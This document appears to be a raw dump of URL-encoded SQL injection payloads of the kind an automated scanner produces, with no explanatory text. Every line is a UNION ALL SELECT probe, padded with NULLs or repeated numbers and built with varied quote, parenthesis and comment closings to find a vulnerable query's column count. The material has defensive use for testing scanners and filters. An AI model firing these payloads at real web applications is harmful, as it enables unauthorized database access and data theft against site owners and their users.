1%27%20%2B%20%28SELECT%20%27AjxW%27%20WHERE%208789%3D8789%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27ClRT%27%20WHERE%209887%3D9887%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27dcKG%27%20WHERE%201997%3D1997%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27dgMN%27%20WHERE%206369%3D6369%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 -8071%29%20UNION%20ALL%20SELECT%209612%2C%209612%2C%209612%2C%209612%2C%209612%2C%209612%2C%209612%2C%209612%2C%209612%2C%209612%2C%209612%23 -8731%29%20UNION%20ALL%20SELECT%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%2C%208603%23 -4053%29%20UNION%20ALL%20SELECT%201978%2C%201978%2C%201978%2C%201978%2C%201978%2C%201978%2C%201978%2C%201978%2C%201978%2C%201978%2C%201978%2C%201978%2C%201978%23 -9087%29%20UNION%20ALL%20SELECT%204283%2C%204283%2C%204283%2C%204283%2C%204283%2C%204283%2C%204283%2C%204283%2C%204283%2C%204283%2C%204283%2C%204283%2C%204283%2C%204283%23 -7671%29%20UNION%20ALL%20SELECT%207170%2C%207170%2C%207170%2C%207170%2C%207170%2C%207170%2C%207170%2C%207170%2C%207170%2C%207170%2C%207170%2C%207170%2C%207170%2C%207170%2C%207170%23 -5149%29%20UNION%20ALL%20SELECT%209411%2C%209411%2C%209411%2C%209411%2C%209411%2C%209411%2C%209411%2C%209411%2C%209411%2C%209411%2C%209411%2C%209411%2C%209411%2C%209411%2C%209411%2C%209411%23 -4594%29%20UNION%20ALL%20SELECT%209069%2C%209069%2C%209069%2C%209069%2C%209069%2C%209069%2C%209069%2C%209069%2C%209069%2C%209069%2C%209069%2C%209069%2C%209069%2C%209069%2C%209069%2C%209069%2C%209069%23 -3769%29%20UNION%20ALL%20SELECT%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%23 -4789%29%20UNION%20ALL%20SELECT%201461%2C%201461%2C%201461%2C%201461%2C%201461%2C%201461%2C%201461%2C%201461%2C%201461%2C%201461%2C%201461%2C%201461%2C%201461%2C%201461%2C%201461%2C%201461%2C%201461%2C%201461%2C%201461%23 -5211%29%20UNION%20ALL%20SELECT%203797%2C%203797%2C%203797%2C%203797%2C%203797%2C%203797%2C%203797%2C%203797%2C%203797%2C%203797%2C%203797%2C%203797%2C%203797%2C%203797%2C%203797%2C%203797%2C%203797%2C%203797%2C%203797%2C%203797%23 -1541%27%29%20UNION%20ALL%20SELECT%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%2C%203258%23 -7949%27%29%20UNION%20ALL%20SELECT%209931%2C%209931%2C%209931%2C%209931%2C%209931%2C%209931%2C%209931%2C%209931%2C%209931%2C%209931%2C%209931%2C%209931%23 -4712%27%29%20UNION%20ALL%20SELECT%206722%2C%206722%2C%206722%2C%206722%2C%206722%2C%206722%2C%206722%2C%206722%2C%206722%2C%206722%2C%206722%2C%206722%2C%206722%23 -3301%27%29%20UNION%20ALL%20SELECT%207280%2C%207280%2C%207280%2C%207280%2C%207280%2C%207280%2C%207280%2C%207280%2C%207280%2C%207280%2C%207280%2C%207280%2C%207280%2C%207280%23 -5365%27%29%20UNION%20ALL%20SELECT%205449%2C%205449%2C%205449%2C%205449%2C%205449%2C%205449%2C%205449%2C%205449%2C%205449%2C%205449%2C%205449%2C%205449%2C%205449%2C%205449%2C%205449%23 -1209%27%29%20UNION%20ALL%20SELECT%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%23 -9520%27%29%20UNION%20ALL%20SELECT%206577%2C%206577%2C%206577%2C%206577%2C%206577%2C%206577%2C%206577%2C%206577%2C%206577%2C%206577%2C%206577%2C%206577%2C%206577%2C%206577%2C%206577%2C%206577%2C%206577%23 -4635%27%29%20UNION%20ALL%20SELECT%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%23 -1181%27%29%20UNION%20ALL%20SELECT%201795%2C%201795%2C%201795%2C%201795%2C%201795%2C%201795%2C%201795%2C%201795%2C%201795%2C%201795%2C%201795%2C%201795%2C%201795%2C%201795%2C%201795%2C%201795%2C%201795%2C%201795%2C%201795%23 -2161%27%29%20UNION%20ALL%20SELECT%207358%2C%207358%2C%207358%2C%207358%2C%207358%2C%207358%2C%207358%2C%207358%2C%207358%2C%207358%2C%207358%2C%207358%2C%207358%2C%207358%2C%207358%2C%207358%2C%207358%2C%207358%2C%207358%2C%207358%23 -7606%27%20UNION%20ALL%20SELECT%207118%2C%207118%2C%207118%2C%207118%2C%207118%2C%207118%2C%207118%2C%207118%2C%207118%2C%207118%2C%207118%23 -6106%27%20UNION%20ALL%20SELECT%207222%2C%207222%2C%207222%2C%207222%2C%207222%2C%207222%2C%207222%2C%207222%2C%207222%2C%207222%2C%207222%2C%207222%23 -9011%27%20UNION%20ALL%20SELECT%208157%2C%208157%2C%208157%2C%208157%2C%208157%2C%208157%2C%208157%2C%208157%2C%208157%2C%208157%2C%208157%2C%208157%2C%208157%23 -9042%27%20UNION%20ALL%20SELECT%205436%2C%205436%2C%205436%2C%205436%2C%205436%2C%205436%2C%205436%2C%205436%2C%205436%2C%205436%2C%205436%2C%205436%2C%205436%2C%205436%23 -4165%27%20UNION%20ALL%20SELECT%202027%2C%202027%2C%202027%2C%202027%2C%202027%2C%202027%2C%202027%2C%202027%2C%202027%2C%202027%2C%202027%2C%202027%2C%202027%2C%202027%2C%202027%23 -5703%27%20UNION%20ALL%20SELECT%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%23 -3730%27%20UNION%20ALL%20SELECT%206478%2C%206478%2C%206478%2C%206478%2C%206478%2C%206478%2C%206478%2C%206478%2C%206478%2C%206478%2C%206478%2C%206478%2C%206478%2C%206478%2C%206478%2C%206478%2C%206478%23 -1628%27%20UNION%20ALL%20SELECT%209445%2C%209445%2C%209445%2C%209445%2C%209445%2C%209445%2C%209445%2C%209445%2C%209445%2C%209445%2C%209445%2C%209445%2C%209445%2C%209445%2C%209445%2C%209445%2C%209445%2C%209445%23 -4944%27%20UNION%20ALL%20SELECT%203045%2C%203045%2C%203045%2C%203045%2C%203045%2C%203045%2C%203045%2C%203045%2C%203045%2C%203045%2C%203045%2C%203045%2C%203045%2C%203045%2C%203045%2C%203045%2C%203045%2C%203045%2C%203045%23 -2037%27%20UNION%20ALL%20SELECT%204749%2C%204749%2C%204749%2C%204749%2C%204749%2C%204749%2C%204749%2C%204749%2C%204749%2C%204749%2C%204749%2C%204749%2C%204749%2C%204749%2C%204749%2C%204749%2C%204749%2C%204749%2C%204749%2C%204749%23 -2715%22%20UNION%20ALL%20SELECT%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%23 -9099%22%20UNION%20ALL%20SELECT%204431%2C%204431%2C%204431%2C%204431%2C%204431%2C%204431%2C%204431%2C%204431%2C%204431%2C%204431%2C%204431%2C%204431%23 -1160%22%20UNION%20ALL%20SELECT%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%23 -9025%22%20UNION%20ALL%20SELECT%207847%2C%207847%2C%207847%2C%207847%2C%207847%2C%207847%2C%207847%2C%207847%2C%207847%2C%207847%2C%207847%2C%207847%2C%207847%2C%207847%23 -1689%22%20UNION%20ALL%20SELECT%206713%2C%206713%2C%206713%2C%206713%2C%206713%2C%206713%2C%206713%2C%206713%2C%206713%2C%206713%2C%206713%2C%206713%2C%206713%2C%206713%2C%206713%23 -5120%22%20UNION%20ALL%20SELECT%202328%2C%202328%2C%202328%2C%202328%2C%202328%2C%202328%2C%202328%2C%202328%2C%202328%2C%202328%2C%202328%2C%202328%2C%202328%2C%202328%2C%202328%2C%202328%23 -7740%22%20UNION%20ALL%20SELECT%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%23 -9160%22%20UNION%20ALL%20SELECT%201228%2C%201228%2C%201228%2C%201228%2C%201228%2C%201228%2C%201228%2C%201228%2C%201228%2C%201228%2C%201228%2C%201228%2C%201228%2C%201228%2C%201228%2C%201228%2C%201228%2C%201228%23 -3767%22%20UNION%20ALL%20SELECT%205599%2C%205599%2C%205599%2C%205599%2C%205599%2C%205599%2C%205599%2C%205599%2C%205599%2C%205599%2C%205599%2C%205599%2C%205599%2C%205599%2C%205599%2C%205599%2C%205599%2C%205599%2C%205599%23 -8329%22%20UNION%20ALL%20SELECT%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%23 -1474%29%20UNION%20ALL%20SELECT%207257%2C%207257%2C%207257%2C%207257%2C%207257%2C%207257%2C%207257%2C%207257%2C%207257%2C%207257%2C%207257%23%20AND%20%286899%3D6899 -4813%29%20UNION%20ALL%20SELECT%208578%2C%208578%2C%208578%2C%208578%2C%208578%2C%208578%2C%208578%2C%208578%2C%208578%2C%208578%2C%208578%2C%208578%23%20AND%20%284711%3D4711 -2136%29%20UNION%20ALL%20SELECT%203403%2C%203403%2C%203403%2C%203403%2C%203403%2C%203403%2C%203403%2C%203403%2C%203403%2C%203403%2C%203403%2C%203403%2C%203403%23%20AND%20%284679%3D4679 -2535%29%20UNION%20ALL%20SELECT%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%23%20AND%20%286788%3D6788 -4069%29%20UNION%20ALL%20SELECT%201772%2C%201772%2C%201772%2C%201772%2C%201772%2C%201772%2C%201772%2C%201772%2C%201772%2C%201772%2C%201772%2C%201772%2C%201772%2C%201772%2C%201772%23%20AND%20%288905%3D8905 -6485%29%20UNION%20ALL%20SELECT%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%23%20AND%20%285515%3D5515 -7597%29%20UNION%20ALL%20SELECT%209260%2C%209260%2C%209260%2C%209260%2C%209260%2C%209260%2C%209260%2C%209260%2C%209260%2C%209260%2C%209260%2C%209260%2C%209260%2C%209260%2C%209260%2C%209260%2C%209260%23%20AND%20%288514%3D8514 -7754%29%20UNION%20ALL%20SELECT%201515%2C%201515%2C%201515%2C%201515%2C%201515%2C%201515%2C%201515%2C%201515%2C%201515%2C%201515%2C%201515%2C%201515%2C%201515%2C%201515%2C%201515%2C%201515%2C%201515%2C%201515%23%20AND%20%284585%3D4585 -3004%29%20UNION%20ALL%20SELECT%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%23%20AND%20%281017%3D1017 -3535%29%20UNION%20ALL%20SELECT%208587%2C%208587%2C%208587%2C%208587%2C%208587%2C%208587%2C%208587%2C%208587%2C%208587%2C%208587%2C%208587%2C%208587%2C%208587%2C%208587%2C%208587%2C%208587%2C%208587%2C%208587%2C%208587%2C%208587%23%20AND%20%281974%3D1974 -4892%29%29%20UNION%20ALL%20SELECT%204245%2C%204245%2C%204245%2C%204245%2C%204245%2C%204245%2C%204245%2C%204245%2C%204245%2C%204245%2C%204245%23%20AND%20%28%286465%3D6465 -3014%29%29%20UNION%20ALL%20SELECT%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%23%20AND%20%28%287916%3D7916 -7063%29%29%20UNION%20ALL%20SELECT%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%2C%203194%23%20AND%20%28%285261%3D5261 -5502%29%29%20UNION%20ALL%20SELECT%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%23%20AND%20%28%287703%3D7703 -2037%29%29%20UNION%20ALL%20SELECT%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%2C%201334%23%20AND%20%28%282602%3D2602 -3595%29%29%20UNION%20ALL%20SELECT%203124%2C%203124%2C%203124%2C%203124%2C%203124%2C%203124%2C%203124%2C%203124%2C%203124%2C%203124%2C%203124%2C%203124%2C%203124%2C%203124%2C%203124%2C%203124%23%20AND%20%28%284754%3D4754 -2497%29%29%20UNION%20ALL%20SELECT%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%23%20AND%20%28%281618%3D1618 -9446%29%29%20UNION%20ALL%20SELECT%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%23%20AND%20%28%285783%3D5783 -2184%29%29%20UNION%20ALL%20SELECT%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%2C%208129%23%20AND%20%28%282721%3D2721 -5526%29%29%20UNION%20ALL%20SELECT%209866%2C%209866%2C%209866%2C%209866%2C%209866%2C%209866%2C%209866%2C%209866%2C%209866%2C%209866%2C%209866%2C%209866%2C%209866%2C%209866%2C%209866%2C%209866%2C%209866%2C%209866%2C%209866%2C%209866%23%20AND%20%28%289349%3D9349 -9545%29%29%29%20UNION%20ALL%20SELECT%207951%2C%207951%2C%207951%2C%207951%2C%207951%2C%207951%2C%207951%2C%207951%2C%207951%2C%207951%2C%207951%23%20AND%20%28%28%287925%3D7925 -3402%29%29%29%20UNION%20ALL%20SELECT%208302%2C%208302%2C%208302%2C%208302%2C%208302%2C%208302%2C%208302%2C%208302%2C%208302%2C%208302%2C%208302%2C%208302%23%20AND%20%28%28%282312%3D2312 -4465%29%29%29%20UNION%20ALL%20SELECT%209200%2C%209200%2C%209200%2C%209200%2C%209200%2C%209200%2C%209200%2C%209200%2C%209200%2C%209200%2C%209200%2C%209200%2C%209200%23%20AND%20%28%28%288106%3D8106 -8229%29%29%29%20UNION%20ALL%20SELECT%202380%2C%202380%2C%202380%2C%202380%2C%202380%2C%202380%2C%202380%2C%202380%2C%202380%2C%202380%2C%202380%2C%202380%2C%202380%2C%202380%23%20AND%20%28%28%281511%3D1511 -6398%29%29%29%20UNION%20ALL%20SELECT%202240%2C%202240%2C%202240%2C%202240%2C%202240%2C%202240%2C%202240%2C%202240%2C%202240%2C%202240%2C%202240%2C%202240%2C%202240%2C%202240%2C%202240%23%20AND%20%28%28%287244%3D7244 -3972%29%29%29%20UNION%20ALL%20SELECT%202928%2C%202928%2C%202928%2C%202928%2C%202928%2C%202928%2C%202928%2C%202928%2C%202928%2C%202928%2C%202928%2C%202928%2C%202928%2C%202928%2C%202928%2C%202928%23%20AND%20%28%28%281397%3D1397 -6058%29%29%29%20UNION%20ALL%20SELECT%204355%2C%204355%2C%204355%2C%204355%2C%204355%2C%204355%2C%204355%2C%204355%2C%204355%2C%204355%2C%204355%2C%204355%2C%204355%2C%204355%2C%204355%2C%204355%2C%204355%23%20AND%20%28%28%289538%3D9538 -4412%29%29%29%20UNION%20ALL%20SELECT%201262%2C%201262%2C%201262%2C%201262%2C%201262%2C%201262%2C%201262%2C%201262%2C%201262%2C%201262%2C%201262%2C%201262%2C%201262%2C%201262%2C%201262%2C%201262%2C%201262%2C%201262%23%20AND%20%28%28%289546%3D9546 -6809%29%29%29%20UNION%20ALL%20SELECT%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%23%20AND%20%28%28%281818%3D1818 -2684%29%29%29%20UNION%20ALL%20SELECT%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%2C%209039%23%20AND%20%28%28%285506%3D5506 -9389%20UNION%20ALL%20SELECT%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%23 -8987%20UNION%20ALL%20SELECT%208490%2C%208490%2C%208490%2C%208490%2C%208490%2C%208490%2C%208490%2C%208490%2C%208490%2C%208490%2C%208490%2C%208490%23 -9003%20UNION%20ALL%20SELECT%207930%2C%207930%2C%207930%2C%207930%2C%207930%2C%207930%2C%207930%2C%207930%2C%207930%2C%207930%2C%207930%2C%207930%2C%207930%23 -7386%20UNION%20ALL%20SELECT%208283%2C%208283%2C%208283%2C%208283%2C%208283%2C%208283%2C%208283%2C%208283%2C%208283%2C%208283%2C%208283%2C%208283%2C%208283%2C%208283%23 -6015%20UNION%20ALL%20SELECT%206127%2C%206127%2C%206127%2C%206127%2C%206127%2C%206127%2C%206127%2C%206127%2C%206127%2C%206127%2C%206127%2C%206127%2C%206127%2C%206127%2C%206127%23 -1708%20UNION%20ALL%20SELECT%202802%2C%202802%2C%202802%2C%202802%2C%202802%2C%202802%2C%202802%2C%202802%2C%202802%2C%202802%2C%202802%2C%202802%2C%202802%2C%202802%2C%202802%2C%202802%23 -9999%20UNION%20ALL%20SELECT%202858%2C%202858%2C%202858%2C%202858%2C%202858%2C%202858%2C%202858%2C%202858%2C%202858%2C%202858%2C%202858%2C%202858%2C%202858%2C%202858%2C%202858%2C%202858%2C%202858%23 -5815%20UNION%20ALL%20SELECT%201766%2C%201766%2C%201766%2C%201766%2C%201766%2C%201766%2C%201766%2C%201766%2C%201766%2C%201766%2C%201766%2C%201766%2C%201766%2C%201766%2C%201766%2C%201766%2C%201766%2C%201766%23 -1764%20UNION%20ALL%20SELECT%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%2C%202952%23 -1435%20UNION%20ALL%20SELECT%203213%2C%203213%2C%203213%2C%203213%2C%203213%2C%203213%2C%203213%2C%203213%2C%203213%2C%203213%2C%203213%2C%203213%2C%203213%2C%203213%2C%203213%2C%203213%2C%203213%2C%203213%2C%203213%2C%203213%23 -9482%27%29%20UNION%20ALL%20SELECT%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%23%20AND%20%28%27XrHu%27%3D%27XrHu -5353%27%29%20UNION%20ALL%20SELECT%205783%2C%205783%2C%205783%2C%205783%2C%205783%2C%205783%2C%205783%2C%205783%2C%205783%2C%205783%2C%205783%2C%205783%23%20AND%20%28%27GcMp%27%3D%27GcMp -6448%27%29%20UNION%20ALL%20SELECT%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%2C%208697%23%20AND%20%28%27chVM%27%3D%27chVM -5265%27%29%20UNION%20ALL%20SELECT%204302%2C%204302%2C%204302%2C%204302%2C%204302%2C%204302%2C%204302%2C%204302%2C%204302%2C%204302%2C%204302%2C%204302%2C%204302%2C%204302%23%20AND%20%28%27mXny%27%3D%27mXny -1290%27%29%20UNION%20ALL%20SELECT%202129%2C%202129%2C%202129%2C%202129%2C%202129%2C%202129%2C%202129%2C%202129%2C%202129%2C%202129%2C%202129%2C%202129%2C%202129%2C%202129%2C%202129%23%20AND%20%28%27LDhK%27%3D%27LDhK -4083%27%29%20UNION%20ALL%20SELECT%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%23%20AND%20%28%27UvQM%27%3D%27UvQM -1203%27%29%20UNION%20ALL%20SELECT%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%2C%207483%23%20AND%20%28%27DPQY%27%3D%27DPQY -3897%27%29%20UNION%20ALL%20SELECT%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%23%20AND%20%28%27XNRc%27%3D%27XNRc -2932%27%29%20UNION%20ALL%20SELECT%204322%2C%204322%2C%204322%2C%204322%2C%204322%2C%204322%2C%204322%2C%204322%2C%204322%2C%204322%2C%204322%2C%204322%2C%204322%2C%204322%2C%204322%2C%204322%2C%204322%2C%204322%2C%204322%23%20AND%20%28%27Cwew%27%3D%27Cwew -6063%27%29%20UNION%20ALL%20SELECT%206362%2C%206362%2C%206362%2C%206362%2C%206362%2C%206362%2C%206362%2C%206362%2C%206362%2C%206362%2C%206362%2C%206362%2C%206362%2C%206362%2C%206362%2C%206362%2C%206362%2C%206362%2C%206362%2C%206362%23%20AND%20%28%27NcrC%27%3D%27NcrC -6269%27%29%29%20UNION%20ALL%20SELECT%206584%2C%206584%2C%206584%2C%206584%2C%206584%2C%206584%2C%206584%2C%206584%2C%206584%2C%206584%2C%206584%23%20AND%20%28%28%27zlGi%27%3D%27zlGi -4806%27%29%29%20UNION%20ALL%20SELECT%204431%2C%204431%2C%204431%2C%204431%2C%204431%2C%204431%2C%204431%2C%204431%2C%204431%2C%204431%2C%204431%2C%204431%23%20AND%20%28%28%27bwOh%27%3D%27bwOh -4945%27%29%29%20UNION%20ALL%20SELECT%207536%2C%207536%2C%207536%2C%207536%2C%207536%2C%207536%2C%207536%2C%207536%2C%207536%2C%207536%2C%207536%2C%207536%2C%207536%23%20AND%20%28%28%27WYjq%27%3D%27WYjq -1585%27%29%29%20UNION%20ALL%20SELECT%204765%2C%204765%2C%204765%2C%204765%2C%204765%2C%204765%2C%204765%2C%204765%2C%204765%2C%204765%2C%204765%2C%204765%2C%204765%2C%204765%23%20AND%20%28%28%27pnpe%27%3D%27pnpe -7969%27%29%29%20UNION%20ALL%20SELECT%206155%2C%206155%2C%206155%2C%206155%2C%206155%2C%206155%2C%206155%2C%206155%2C%206155%2C%206155%2C%206155%2C%206155%2C%206155%2C%206155%2C%206155%23%20AND%20%28%28%27ZJKk%27%3D%27ZJKk -9558%27%29%29%20UNION%20ALL%20SELECT%208998%2C%208998%2C%208998%2C%208998%2C%208998%2C%208998%2C%208998%2C%208998%2C%208998%2C%208998%2C%208998%2C%208998%2C%208998%2C%208998%2C%208998%2C%208998%23%20AND%20%28%28%27MVMx%27%3D%27MVMx -1538%27%29%29%20UNION%20ALL%20SELECT%206211%2C%206211%2C%206211%2C%206211%2C%206211%2C%206211%2C%206211%2C%206211%2C%206211%2C%206211%2C%206211%2C%206211%2C%206211%2C%206211%2C%206211%2C%206211%2C%206211%23%20AND%20%28%28%27TcHj%27%3D%27TcHj -6498%27%29%29%20UNION%20ALL%20SELECT%201173%2C%201173%2C%201173%2C%201173%2C%201173%2C%201173%2C%201173%2C%201173%2C%201173%2C%201173%2C%201173%2C%201173%2C%201173%2C%201173%2C%201173%2C%201173%2C%201173%2C%201173%23%20AND%20%28%28%27uwGc%27%3D%27uwGc -3036%27%29%29%20UNION%20ALL%20SELECT%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%2C%207736%23%20AND%20%28%28%27MVhW%27%3D%27MVhW 